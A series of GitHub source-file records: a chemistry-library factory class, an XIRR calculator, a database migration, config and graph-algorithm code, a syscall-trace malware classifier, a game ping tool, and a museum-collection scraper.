smiles='SC(=O)CC(=O)S',\n functional_groups=(thioacid_factory, ),\n )\n\n .. 
testcode:: changing-the-bonder-and-deleter-atoms\n :hide:\n\n fg1, fg2 = building_block.get_functional_groups()\n assert fg1.get_num_bonders() == 1\n assert sum(1 for _ in fg1.get_deleters()) == 1\n assert fg2.get_num_bonders() == 1\n assert sum(1 for _ in fg2.get_deleters()) == 1\n\n assert all(\n isinstance(atom, stk.C)\n for functional_group\n in building_block.get_functional_groups()\n for atom\n in functional_group.get_bonders()\n )\n assert all(\n isinstance(atom, stk.O)\n for functional_group\n in building_block.get_functional_groups()\n for atom\n in functional_group.get_deleters()\n )\n\n See Also\n --------\n :class:`.GenericFunctionalGroup`\n Defines *bonders* and *deleters*.\n\n \"\"\"\n\n def __init__(self, bonders=(1,), deleters=(3, 4), placers=None):\n \"\"\"\n Initialize a :class:`.ThioacidFactory` instance.\n\n Parameters\n ----------\n bonders : :class:`tuple` of :class:`int`\n The indices of atoms in the functional group string, which\n are *bonder* atoms.\n\n deleters : :class:`tuple` of :class:`int`\n The indices of atoms in the functional group string, which\n are *deleter* atoms.\n\n \"\"\"\n\n self._bonders = bonders\n self._deleters = deleters\n self._placers = bonders if placers is None else placers\n\n def get_functional_groups(self, molecule):\n for atom_ids in get_atom_ids(\"[*][C](=[O])[S][H]\", molecule):\n atoms = tuple(molecule.get_atoms(atom_ids))\n yield Thioacid(\n carbon=atoms[1],\n oxygen=atoms[2],\n sulfur=atoms[3],\n hydrogen=atoms[4],\n atom=atoms[0],\n bonders=tuple(atoms[i] for i in self._bonders),\n deleters=tuple(atoms[i] for i in self._deleters),\n placers=tuple(atoms[i] for i in self._placers),\n )\n","repo_name":"lukasturcani/stk","sub_path":"src/stk/_internal/functional_group_factories/thioacid_factory.py","file_name":"thioacid_factory.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"40"} +{"seq_id":"8720381137","text":"from dataclasses import dataclass\nimport datetime\nimport math\n\n@dataclass(frozen=True)\nclass Payment:\n Date: datetime.datetime\n Sum: float\n\n# https://www.youtube.com/watch?v=9_Lj1CSbAh0&t=497s\ndef arsageraRate(payments: list[Payment]):\n payments = sorted(payments, key=lambda x: x.Date)\n minDate = payments[0].Date\n maxDate = payments[-1].Date\n totalYears = yearsBetween(minDate, maxDate)\n\n workingAmount=0.0\n workingSum=0.0\n totalPnL=0.0\n for i, item in enumerate(payments):\n current = item.Sum\n totalPnL += current\n if i < len(payments)-1:\n workingSum -= current\n if workingSum > 0:\n weight = yearsBetween(item.Date, payments[i+1].Date) / totalYears\n workingAmount += workingSum * weight\n\n rate = 1+totalPnL/workingAmount\n annualRate = rate ** (1.0/totalYears)\n return rate, annualRate\n\ndef yearsBetween(minDate, maxDate):\n return (maxDate-minDate).days/365.25\n\n@dataclass(frozen=True)\nclass Cashflow:\n Years: float\n Sum: float\n\ndef _convertToCashflows(payments: list[Payment]):\n minDate = min(payments, key= lambda x: x.Date).Date\n return [Cashflow(yearsBetween(minDate, x.Date), x.Sum) for x in payments]\n\ndef irr(payments):\n return _calculateXirr(_convertToCashflows(payments), 0.01, 1000000, 0.0001)\n\ndef _calculateXirr(cashFlows, lowRate, highRate, precision):\n lowResult = _calcEquation(cashFlows, lowRate)\n highResult = _calcEquation(cashFlows, highRate)\n while True:\n if math.copysign(1.0, lowResult)==math.copysign(1.0, highResult):\n return None\n \n middleRate = 0.5 * (lowRate + highRate)\n 
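# Bisection step: evaluate the equation at the midpoint and keep the half-interval whose endpoints still bracket a sign change, halving until |result| <= precision.\n        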
middleResult = _calcEquation(cashFlows, middleRate)\n if abs(middleResult) <= precision:\n return middleRate\n\n if math.copysign(1.0, middleResult) == math.copysign(1.0, lowResult):\n lowRate = middleRate\n lowResult = middleResult\n else:\n highRate = middleRate\n highResult = middleResult\n\n\ndef _calcEquation(cashflows, rate):\n return sum(x.Sum * pow(rate, -x.Years) for x in cashflows)\n","repo_name":"ChizhovVadim/assetsdev","sub_path":"internal/xirr.py","file_name":"xirr.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19689197615","text":"\"\"\"empty message\n\nRevision ID: 3b92ecf22681\nRevises: 3cb7bd044853\nCreate Date: 2015-08-03 11:30:03.522336\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3b92ecf22681'\ndown_revision = '3cb7bd044853'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('users', 'email',\n existing_type=mysql.VARCHAR(length=64),\n nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('users', 'email',\n existing_type=mysql.VARCHAR(length=64),\n nullable=False)\n ### end Alembic commands ###\n","repo_name":"sggaffney/pathscore","sub_path":"migrations/versions/3b92ecf22681_.py","file_name":"3b92ecf22681_.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"2618390517","text":"# -*- coding:utf-8 -*-\nfrom helpers.phLogging import PhLogging\nfrom helpers.singleton import singleton\nimport json\nfrom config.projectDataConfig import project_default_conf\nimport re\nfrom functools import reduce\n\n\n@singleton\nclass PhAppConfig(object):\n condi = []\n\n def __init__(self):\n self.conf = {}\n self.queryDefinedSchemas()\n\n def getConf(self):\n return self.conf\n\n def queryDefinedSchemas(self):\n # Bug: Windows can hit encoding problems when reading the file, so all file reads were removed for now\n # f = open('./config/projectDataConfig.json', encoding='utf-8')\n # tmp = json.loads(f.read(4096))\n tmp = project_default_conf\n self.conf['defined_schema'] = tmp['schema']\n self.conf['condi_schema'] = tmp['condi_schema']\n self.conf['condi_schema_local'] = tmp['condi_schema_local']\n self.conf['trans_schema'] = tmp['trans_schema']\n self.conf['table'] = tmp['table']\n self.conf['count_condi'] = tmp['count_condi']\n self.conf['can_change_cols'] = tmp['can_change_cols']\n self.conf['non_null_cols'] = tmp['non_null_cols']\n self.conf['qc_can_change_cols'] = tmp['qc_can_change_cols']\n\n def configClear(self):\n self.condi = []\n self.conf = {}\n\n def isAdmin(self):\n return self.getConf()['scope'] == '*'\n\n def isTmpUser(self):\n return not self.isAdmin()\n\n def filterEmpty(self, lst):\n return list(filter(lambda x: x != '', lst))\n\n def condi2IndexRange(self, condi):\n regex = r"\\d+"\n matches = re.finditer(regex, condi, re.MULTILINE)\n result = []\n for matchNum, match in enumerate(matches, start=1):\n result.append(int(match.group()))\n\n if len(result) > 1:\n return min(result), max(result)\n elif len(result) == 1:\n return min(result), -1\n else:\n return -1, -1\n\n def IndexRange2Condi(self, min, max):\n result = []\n if min >= 0:\n result.append('Index >= ' + str(min))\n\n if max >= 0:\n result.append('Index < ' + str(max))\n\n if len(result) > 0:\n return ' and 
'.join(result)\n else:\n return 'Index == -1'\n\n def findMaxRequestIndex(self):\n all_indices = list(map(lambda x: list(self.condi2IndexRange(x[2])), self.condi))\n all_indices = reduce(lambda x, y: x + y, all_indices)\n return max(all_indices)\n","repo_name":"PharbersDeveloper/hosp_mapping","sub_path":"helpers/appConfig.py","file_name":"appConfig.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9979069715","text":"#name#\n# Strongly Connected Components (SCC) decomposition\n#description#\n# Strongly connected components (SCC): run an SCC decomposition on graph g\n#body#\nclass SCCGraph:\n def __init__(self, N):\n self.N = N\n self.edges = []\n self.ef, self.er = [[] for _ in range(N)], [[] for _ in range(N)]\n\n def add_edge(self, v, w):\n self.edges.append((v, w))\n self.ef[v].append(w)\n self.er[w].append(v)\n\n def scc_group(self):\n N = self.N\n group = [None] * N\n visited = [False] * N\n order = []\n for x in range(N):\n if visited[x]: continue\n stack = [x]\n visited[x] = True\n while stack:\n y = stack.pop()\n movable = False\n for ny in self.ef[y]:\n if visited[ny]: continue\n movable = True\n visited[ny] = True\n stack.append(y)\n stack.append(ny)\n break\n if not movable: order.append(y)\n visited = [False] * N\n count = 0\n for x in order[::-1]:\n if visited[x]: continue\n stack = [x]\n group[x] = count\n while stack:\n y = stack.pop()\n visited[y] = 1\n for ny in self.er[y]:\n if visited[ny]: continue\n group[ny] = count\n stack.append(ny)\n count += 1\n return count, group\n\n def scc(self):\n count, group = self.scc_group()\n groups = [[] for _ in range(count)]\n for i, x in enumerate(group):\n groups[x].append(i)\n return groups\n\n####################################\n\nn, m = map(int, input().split())\nscc = SCCGraph(n)\n\nfor i in range(m):\n _a, _b = map(int, input().split())\n# _a -= 1; _b -= 1\n scc.add_edge(_a, _b)\n\n_, gr = scc.scc_group()\nfor _ in range(int(input())):\n u, v = map(int, input().split())\n print(int(gr[u] == gr[v]))\n\n# print(scc.scc_group())\n#(3,_[0,_1,_1,_1,_2])\n# print(scc.scc())\n#[[0],_[1,_2,_3],_[4]]\n\n# Strongly connected components (SCC): run an SCC decomposition on graph g\n# https://hkawabata.github.io/technical-note/note/Algorithm/graph/scc.html\n# In a directed graph, group the vertices into components whose members can all reach each other\n# Even if the original directed graph is not a DAG, its SCC condensation forms a DAG\n# Construction\n# DFS from an arbitrary vertex (post-order traversal), labelling vertices with increasing numbers from 1:\n# prepare the graph with every edge reversed:\n# traverse from the vertex with the largest label -> every vertex reached belongs to one SCC:\n# among the unvisited vertices, traverse from the one with the largest label -> every vertex reached belongs to one SCC:\n\n# https://atcoder.jp/contests/practice2/tasks/practice2_g\n\n#prefix#\n# Lib_GD_強連結成分分解_SCC\n#end#\n","repo_name":"ibtosmlin/atcoder","sub_path":"lib/lib/Lib_GD_強連結成分分解.py","file_name":"Lib_GD_強連結成分分解.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9914550000","text":"'''Assignment 7 question 1 No Repeats\r\nAdam Smith\r\n27 April 2014'''\r\n\r\nStrings = [input("Enter strings (end with DONE):\\n")] #list that stores the entered strings\r\n\r\nwhile "DONE" not in Strings: \r\n UserInput = input()\r\n if UserInput == "DONE": #breaks the loop if the user inputs DONE\r\n break\r\n \r\n elif UserInput not in Strings: #if the string does not exist add it to the list\r\n Strings.append(UserInput)\r\n\r\nprint()\r\nprint("Unique list:")\r\nfor output in Strings: #outputs the list\r\n if output != "DONE":\r\n \r\n 
print(output)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/smtada002/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32256353069","text":"from __future__ import print_function\n\nimport logging\nimport numpy as np\nfrom optparse import OptionParser\nimport sys\nfrom time import time\nimport matplotlib.pyplot as plt\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn import metrics\nfrom sklearn.utils import shuffle\n\n\n\nuseTFIDF = True\nshowSampleVector = False\nshowMostInformativeFeatures = True\nhowManyInformativeFeatures = 10\nnGRAM1 = 10\nnGRAM2 = 10\nweight = 10\n\nask = input(\"Do you want to specify parameters or use default values? Input 'T' or 'F'. \")\nif ask == \"T\":\n useTFIDFStr = input(\"Do you want to use tfidfVectorizer or CountVectorizer? Type T for tfidfVectorizer and F for CountVectorizer \")\n if useTFIDFStr == \"T\":\n useTFIDF = True\n else:\n useTFIDF = False\n\n showSampleVectorStr = input(\"Do you want to print an example vectorized corpus? (T/F) \")\n if showSampleVectorStr == \"T\":\n showSampleVector = True\n else:\n showSampleVector = False\n\n showMostInformativeFeaturesStr = input(\"Do you want to print the most informative feature in some of the classifiers? (T/F) \")\n if showMostInformativeFeaturesStr == \"T\":\n showMostInformativeFeatures = True\n howManyInformativeFeatures = int(input(\"How many of these informative features do you want to print for each binary case? Input a number \"))\n else:\n showMostInformativeFeatures = False\n\n nGRAM1 = int(input(\"N-Gram lower bound (Read README.md for more information)? Input a number \"))\n nGRAM2 = int(input(\"N-Gram Upper bound? Input a number \"))\n weight = int(input(\"What weight do you want to use to separate train & testing? 
Input a number \"))\n\n\nmain_corpus = []\nmain_corpus_target = []\n\nmy_categories = ['benign', 'malware']\n\n# feeding corpus the testing data\n\nprint(\"Loading system call database for categories:\")\nprint(my_categories if my_categories else \"all\")\n\n\nimport glob\nimport os\n\nmalCOUNT = 0\nbenCOUNT = 0\nfor filename in glob.glob(os.path.join('./sysMAL', '*.txt')):\n fMAL = open(filename, \"r\")\n aggregate = \"\"\n for line in fMAL:\n linea = line[:(len(line)-1)]\n aggregate += \" \" + linea\n main_corpus.append(aggregate)\n main_corpus_target.append(1)\n malCOUNT += 1\n\nfor filename in glob.glob(os.path.join('./sysBEN', '*.txt')):\n fBEN = open(filename, \"r\")\n aggregate = \"\"\n for line in fBEN:\n linea = line[:(len(line) - 1)]\n aggregate += \" \" + linea\n main_corpus.append(aggregate)\n main_corpus_target.append(0)\n benCOUNT += 1\n\n# shuffling the dataset\nmain_corpus_target, main_corpus = shuffle(main_corpus_target, main_corpus, random_state=0)\n\n\n\n\n# weight as determined in the top of the code\ntrain_corpus = main_corpus[:(weight*len(main_corpus)//(weight+1))]\ntrain_corpus_target = main_corpus_target[:(weight*len(main_corpus)//(weight+1))]\ntest_corpus = main_corpus[(len(main_corpus)-(len(main_corpus)//(weight+1))):]\ntest_corpus_target = main_corpus_target[(len(main_corpus)-len(main_corpus)//(weight+1)):]\n\n\n\n\nprint(\"%d documents - %0.3fMB (training set)\" % (\n len(train_corpus_target), train_corpus_size_mb))\nprint(\"%d documents - %0.3fMB (test set)\" % (\n len(test_corpus_target), test_corpus_size_mb))\nprint(\"%d categories\" % len(my_categories))\nprint()\nprint(\"Benign Traces: \"+str(benCOUNT)+\" traces\")\nprint(\"Malicious Traces: \"+str(malCOUNT)+\" traces\")\nprint()\n\n\n\nprint(\"Extracting features from the training data using a sparse vectorizer...\")\nt0 = time()\n\nif useTFIDF:\n vectorizer = TfidfVectorizer(ngram_range=(nGRAM1, nGRAM2), min_df=1, use_idf=True, smooth_idf=True) ##############\nelse:\n vectorizer = CountVectorizer(ngram_range=(nGRAM1, nGRAM2))\n\nanalyze = vectorizer.build_analyzer()\n\nif showSampleVector:\n print(analyze(test_corpus[1]))\n\nX_train = vectorizer.fit_transform(train_corpus)\n\n\n\nduration = time() - t0\nprint(\"done in %fs at %0.3fMB/s\" % (duration, train_corpus_size_mb / duration))\nprint(\"n_samples: %d, n_features: %d\" % X_train.shape)\nprint()\n\nprint(\"Extracting features from the test data using the same vectorizer...\")\nt0 = time()\nX_test = vectorizer.transform(test_corpus)\nduration = time() - t0\nprint(\"done in %fs at %0.3fMB/s\" % (duration, test_corpus_size_mb / duration))\nprint(\"n_samples: %d, n_features: %d\" % X_test.shape)\nprint()\n\n\n# show which are the definitive features\ndef show_most_informative_features(vectorizer, clf, n=20):\n feature_names = vectorizer.get_feature_names()\n coefs_with_fns = sorted(zip(clf.coef_[0], feature_names))\n coefs_with_fns_mal = coefs_with_fns[:-(n + 1):-1]\n coefs_with_fns = sorted(zip(clf.coef_[0], feature_names))[:n]\n\n print()\n print(\"Most Informative Benign Features:\")\n for (coef_1, fn_1) in coefs_with_fns:\n print(coef_1, fn_1)\n print()\n print(\"Most Informative Malicious Features:\")\n for (coef_2, fn_2) in coefs_with_fns_mal:\n print(coef_2, fn_2)\n print()\n\n\ndef benchmark(clf, showTopFeatures=False):\n print('_'*60)\n print(\"Training: \")\n print(clf)\n t0 = time()\n clf.fit(X_train, train_corpus_target)\n\n train_time = time() - t0\n print(\"train time: %0.3fs\" % train_time)\n\n\n t0 = time()\n pred = clf.predict(X_test)\n 
test_time = time() - t0\n print("test time: %0.3fs" % test_time)\n\n score = metrics.accuracy_score(test_corpus_target, pred)\n print("accuracy: %0.3f" % score)\n\n if hasattr(clf, 'coef_'):\n print("dimensionality: %d" % clf.coef_.shape[1])\n print("density: %f" % density(clf.coef_))\n print()\n print(metrics.classification_report(test_corpus_target, pred, target_names=my_categories))\n print()\n clf_descr = str(clf).split('(')[0]\n\n print("Predicted values: ")\n print(pred.tolist())\n print()\n print("Real values:")\n print(test_corpus_target)\n print()\n mCount = 0\n for i in test_corpus_target:\n if i == 1:\n mCount+=1\n print("Proportion of malicious traces:")\n print(mCount/len(test_corpus_target))\n\n if showTopFeatures:\n show_most_informative_features(vectorizer, clf, 10)\n\n return clf_descr, score, train_time, test_time\n\n\nresults = []\nfor clf, name in (\n (RidgeClassifier(tol=1e-2, solver="lsqr"), "Ridge Classifier"),\n (Perceptron(n_iter=50), "Perceptron"),\n (PassiveAggressiveClassifier(n_iter=50), "Passive-Aggressive"),\n (KNeighborsClassifier(n_neighbors=10), "kNN"),\n (RandomForestClassifier(n_estimators=100), "Random forest")):\n print('=' * 80)\n print(name)\n results.append(benchmark(clf))\n\n\n\n\n\n\nfor penalty in ["l2", "l1"]:\n print('=' * 80)\n print("%s penalty" % penalty.upper())\n # Train Liblinear model\n results.append(benchmark(LinearSVC(penalty=penalty, dual=False,\n tol=1e-3), showMostInformativeFeatures))\n\n # Train SGD model\n results.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,\n penalty=penalty), showMostInformativeFeatures))\n\n# Train SGD with Elastic Net penalty\nprint('=' * 80)\nprint("Elastic-Net penalty")\nresults.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,\n penalty="elasticnet")))\n\n# Train NearestCentroid without threshold\nprint('=' * 80)\nprint("NearestCentroid (aka Rocchio classifier)")\nresults.append(benchmark(NearestCentroid()))\n\n# Train sparse Naive Bayes classifiers\nprint('=' * 80)\nprint("Naive Bayes")\nresults.append(benchmark(MultinomialNB(alpha=.01)))\nresults.append(benchmark(BernoulliNB(alpha=.01)))\n\nprint('=' * 80)\nprint("LinearSVC with L1-based feature selection")\n# The smaller C, the stronger the regularization.\n# The more regularization, the more sparsity.\nresults.append(benchmark(Pipeline([\n ('feature_selection', SelectFromModel(LinearSVC(penalty="l1", dual=False,\n tol=1e-3))),\n ('classification', LinearSVC(penalty="l2"))])))\n\n\n# plotting results\n\nindices = np.arange(len(results))\n\nresults = [[x[i] for x in results] for i in range(4)]\n\nclf_names, score, training_time, test_time = results\ntraining_time = np.array(training_time) / np.max(training_time)\ntest_time = np.array(test_time) / np.max(test_time)\n\nplt.figure(figsize=(12, 8))\nplt.title("Score")\nplt.barh(indices, score, .2, label="score", color='navy')\nplt.barh(indices + .3, training_time, .2, label="training time",\n color='c')\nplt.barh(indices + .6, test_time, .2, label="test time", color='darkorange')\nplt.yticks(())\nplt.legend(loc='best')\nplt.subplots_adjust(left=.25)\nplt.subplots_adjust(top=.95)\nplt.subplots_adjust(bottom=.05)\n\nfor i, c in zip(indices, clf_names):\n plt.text(-.3, i, 
c)\n\nplt.show()\n","repo_name":"NtMalDetect/NtMalDetect","sub_path":"finding_models/testing_classifiers.py","file_name":"testing_classifiers.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"42701601698","text":"from ping3 import ping\n\nfrom utils.get_url import get_json_from_url\n\n\ndef get_game_pings():\n cs2 = get_cs2()\n valo = get_valorant()\n return {\n "cs2_sgp": cs2["sgp"],\n "cs2_bom": cs2["bom"],\n "valo_sea": valo["sea"]\n }\n\n\ndef get_cs2():\n req = get_json_from_url("https://api.steampowered.com/ISteamApps/GetSDRConfig/v1/?appid=730")\n sgp_relays = req.get("pops").get("sgp").get("relays")\n first_relay_ipv4 = sgp_relays[0].get("ipv4")\n sgp_round_trip_time = ping_ipv4(first_relay_ipv4)\n\n bom_relays = req.get("pops").get("bom2").get("relays")\n first_relay_ipv4 = bom_relays[0].get("ipv4")\n bom_round_trip_time = ping_ipv4(first_relay_ipv4)\n\n return {\n "sgp": sgp_round_trip_time,\n "bom": bom_round_trip_time\n }\n\n\ndef get_valorant():\n sea_valo = "dynamodb.ap-southeast-1.amazonaws.com"\n sea_round_trip_time = ping_ipv4(sea_valo)\n return {\n "sea": sea_round_trip_time\n }\n\n\ndef ping_ipv4(ipv4_address):\n response = ping(ipv4_address, unit='ms', timeout=1)\n if not response:\n return None # ping3 may return None (timeout) or False (error); guard before int()\n return int(response)\n","repo_name":"phoenixatom/SVS","sub_path":"modules/game_pings.py","file_name":"game_pings.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2911420293","text":"import numpy\nfrom copy import deepcopy\n\n\nenable_log = True\nlog_file = "log.txt"\nlog_indent = 0\n\n\nclass Function:\n def __init__(self, name):\n self.name = name\n self.args = []\n self.defs = []\n self.given_args = []\n\n def __str__(self):\n string = self.name\n for arg in self.given_args:\n if separate(str(arg))[0] != str(arg):\n string += " (" + str(arg) + ")"\n else:\n string += " " + str(arg)\n return string\n\n def __repr__(self):\n return "Function(" + self.name + ")"\n\n def add_def(self, args, body):\n self.args.append(args)\n self.defs.append(body)\n\n def evaluate(self, new_args, namespace):\n args = self.given_args + new_args\n if enable_log:\n string = self.name\n for arg in args:\n if separate(str(arg))[0] != str(arg):\n string += " (" + str(arg) + ")"\n else:\n string += " " + str(arg)\n log("(start) evaluating " + string + " " + str(namespace), 1)\n arg_matches = deepcopy(self.args)\n for i in range(len(self.given_args), len(args)):\n for j in range(len(self.args)):\n if i < len(self.args[j]) and not isinstance(self.args[j][i], Function):\n if args[i] != self.args[j][i]:\n arg_matches[j] = None\n for i in range(len(arg_matches)):\n if arg_matches[i] is not None and len(arg_matches[i]) <= len(args):\n result = self.call(args, i, namespace)\n if enable_log:\n log("(full) evaluating " + string + " got " + str(result), -1)\n return result\n matches = [arg for arg in arg_matches if arg is not None]\n defs = [self.defs[i] for i in range(len(arg_matches)) if arg_matches[i] is not None]\n result = type(self)(self.name)\n for i in range(len(matches)):\n result.add_def(matches[i], defs[i])\n result.given_args = args\n if enable_log:\n log("(partial) evaluating " + string + " got " + str(result), -1)\n return result\n\n def call(self, args, which, namespace):\n taken_num = len(self.args[which])\n local_namespace = deepcopy(namespace)\n for i 
in range(taken_num):\n if isinstance(self.args[which][i], Function):\n local_namespace[self.args[which][i].name] = args[i]\n body_parts = [value(part, local_namespace) for part in separate(self.defs[which])]\n if not isinstance(body_parts[0], Function):\n return body_parts[0]\n func = body_parts[0]\n func_args = body_parts[1:]\n result = func.evaluate(func_args, local_namespace)\n remaining_args = args[taken_num:]\n if not isinstance(result, Function):\n if len(remaining_args) > 0:\n raise RuntimeError("Too many arguments for " + self.name)\n return result\n return result.evaluate(remaining_args, namespace)\n\n\ndef value(string, namespace):\n if enable_log:\n log("(start) finding value of " + string + " " + str(namespace), 1)\n stripped = string.strip()\n while stripped[0] == "(" and stripped[-1] == ")":\n stripped = stripped[1:-1]\n if stripped[0] == stripped[-1] == '"':\n result = stripped[1:-1]\n if enable_log:\n log("(value) value of " + string + " is " + str(result), -1)\n return result\n if stripped[0] == "[" and stripped[-1] == "]":\n parts = separate(stripped[1:-1])\n val = []\n for part in parts:\n val.append(value(part, namespace))\n result = numpy.array(val)\n if enable_log:\n log("(value) value of " + string + " is " + str(result), -1)\n return result\n try:\n val = int(stripped)\n except ValueError:\n pass\n else:\n result = val\n if enable_log:\n log("(value) value of " + string + " is " + str(result), -1)\n return result\n try:\n val = numpy.float32(stripped)\n except ValueError:\n pass\n else:\n result = val\n if enable_log:\n log("(value) value of " + string + " is " + str(result), -1)\n return result\n parts = separate(stripped)\n name = parts[0]\n args = [value(arg, namespace) for arg in parts[1:]]\n if name in namespace:\n if not isinstance(namespace[name], Function):\n result = namespace[name]\n if enable_log:\n log("(name) value of " + string + " is " + str(result), -1)\n return result\n result = namespace[name].evaluate(args, namespace)\n if enable_log:\n log("(namefun) value of " + string + " is " + str(result), -1)\n return result\n result = Function(name).evaluate(args, namespace)\n if enable_log:\n log("(func) value of " + string + " is " + str(result), -1)\n return result\n\n\ndef separate(string):\n parts = []\n paren_depth = 0\n in_str = False\n in_space = True\n part_start = 0\n for i in range(len(string)):\n char = string[i]\n if not in_space and char == " ":\n in_space = True\n if paren_depth == 0 and not in_str:\n parts.append(string[part_start:i])\n elif in_space and char != " ":\n in_space = False\n if paren_depth == 0 and not in_str:\n part_start = i\n if char in "[(":\n paren_depth += 1\n elif char in "])":\n paren_depth -= 1\n elif char == '"':\n in_str = not in_str\n if not in_space:\n parts.append(string[part_start:])\n return parts\n\n\ndef log(string, ind_inc):\n global log_indent\n with open(log_file, "a") as file:\n file.write(" " * log_indent + string + "\\n")\n log_indent += ind_inc\n","repo_name":"Shrimpy48/interpret","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36577031219","text":"class Solution(object):\r\n def hasCycle(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n first, second = head, head\r\n while first and second and second.next:\r\n first = first.next\r\n second = second.next.next\r\n if 
first == second:\r\n return True\r\n return False\r\n","repo_name":"andychuah/Leetcode","sub_path":"Leetcode-141.py","file_name":"Leetcode-141.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19653264593","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom tqdm import tqdm\nimport os\nimport urllib\n\nDIR_PATH = os.path.dirname(os.path.abspath(__file__))\n\n# original date ranges, from the site\nSEARCH_DATE_RANGES = [\"8000 BCE\",\"7000 BCE\",\"6000 BCE\",\"5000 BCE\",\"4000 BCE\",\"3000 BCE\",\"2000 BCE\",\"1000 BCE\",\"1 CE\",\"500 CE\",\"1000 CE\",\"1200\",\"1400\",\"1600\",\"1700\",\"1800\",\"1900\",\"1910\",\"1920\",\"1930\",\"1940\",\"1950\",\"1960\",\"1970\",\"1980\",\"1990\",\"2000\",\"2010\",\"Present\"]\n# had to go 10 years at a time as the 1800-1900 range has more than 10k results\n# which is the max number of results that can be returned\nSEARCH_DATE_RANGES_1800 = list(map(str, range(1800, 1901, 10)))\n\nIIIF_DOWNLOAD_URLS_OUT_PATH = os.path.join(DIR_PATH, '_data', '0.iiif-manifest-urls.txt')\nIIIF_MANIFEST_URL = 'https://api.artic.edu/api/v1/artworks/{}/manifest.json'\n\ndef get_search_url(date_start, date_end, page_number):\n url_params = urllib.parse.urlencode({\n 'date-start': date_start,\n 'date-end': date_end,\n 'page': page_number\n })\n url = 'https://www.artic.edu/collection?{}&is_public_domain=1'.format(\n url_params\n )\n return url\n\n\n# return object ids, and whether there is a next page\ndef get_page_results_and_next_page_url(url):\n print(url)\n\n page_html = requests.get(url).text\n\n if 'Sorry, we couldn’t find any results matching your criteria' in page_html:\n return {'artwork_ids': [], 'next_page_url': None}\n\n page_soup = BeautifulSoup(page_html, 'html.parser')\n\n next_page_url = None\n # I've seen nicer code.\n res = page_soup.find_all('ul', class_='m-paginator__prev-next')\n if len(res) == 1:\n next_li = res[0].find_all('li')\n if len(next_li):\n next_li = next_li[0]\n next_span = next_li.find_all('span')[0]\n if next_span.text == 'Next':\n next_link = next_li.find_all('a')[0]\n next_page_url = next_link['href']\n else:\n print('ERR could not find ul > li')\n\n artwork_ids = []\n res = page_soup.find('ul', {'id': 'artworksList'})\n if res:\n listings = res.find_all('li', class_='m-listing')\n for listing in listings:\n res = re.search(r'artworks/(\\d+)/', listing.find('a')['href'])\n artwork_ids.append(res.groups()[0])\n else:\n print('ERR could not find artworksList')\n\n return {\n 'artwork_ids': artwork_ids,\n 'next_page_url': next_page_url \n }\n\n\nwith open(IIIF_DOWNLOAD_URLS_OUT_PATH, 'a') as f_out:\n for date_range_idx in tqdm(range(len(SEARCH_DATE_RANGES_1800) - 1)):\n date_start = SEARCH_DATE_RANGES_1800[date_range_idx]\n date_end = SEARCH_DATE_RANGES_1800[date_range_idx + 1]\n\n next_page_url = get_search_url(date_start, date_end, 1)\n with tqdm() as pbar:\n while next_page_url:\n results = get_page_results_and_next_page_url(next_page_url)\n\n for listing_id in results['artwork_ids']:\n url = IIIF_MANIFEST_URL.format(listing_id)\n f_out.write('{}\\n'.format(url))\n\n # may be None, signalling we've iterated through all pages\n next_page_url = results['next_page_url']\n 
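# tick the progress bar once per scraped results page (the page count per date range is not known up front)\n 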
